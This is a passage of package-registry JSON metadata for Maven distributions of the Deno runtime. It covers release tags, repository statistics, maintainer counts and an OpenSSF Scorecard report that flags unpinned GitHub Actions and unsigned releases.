/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T16:41:47.121Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":31.517641743763917,"dependent_packages_count":45.05979389543345,"stargazers_count":0.019289227680756138,"forks_count":1.2980935813308854,"docker_downloads_count":null,"average":19.473704612052252},"purl":"pkg:maven/org.mvnpm.at.deno/win32-arm64","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.mvnpm.at.deno:win32-arm64","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.mvnpm.at.deno:win32-arm64","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.mvnpm.at.deno:win32-arm64/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:win32-arm64/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:win32-arm64/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:win32-arm64/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:win32-arm64/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:win32-arm64/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:win32-arm64/codemeta","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://maven-central.storage-download.googleapis.com/maven2","ecosystem":"maven","default":true,"packages_count":620154,"maintainers_count":0,"namespaces_count":82381,"keywords_count":36851,"github":"maven-central","metadata":{"funded_packages_count":48065,"rate_limit":2},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-09-01T05:04:44.165Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":14141349,"name":"org.mvnpm.at.deno:linux-arm64-glibc","ecosystem":"maven","description":"linux-arm64-glibc distribution of Deno","homepage":"https://deno.land","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":"org.mvnpm.at.deno","versions_count":17,"first_release_published_at":"2025-10-20T11:23:26.000Z","latest_release_published_at":"2026-08-08T02:21:24.000Z","latest_release_number":"2.9.5","last_synced_at":"2026-08-28T22:19:38.011Z","created_at":"2026-03-28T12:01:24.759Z","updated_at":"2026-08-28T22:19:38.011Z","registry_url":"https://central.sonatype.com/artifact/org.mvnpm.at.deno/linux-arm64-glibc/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.mvnpm.at.deno/linux-arm64-glibc/","metadata":{},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: 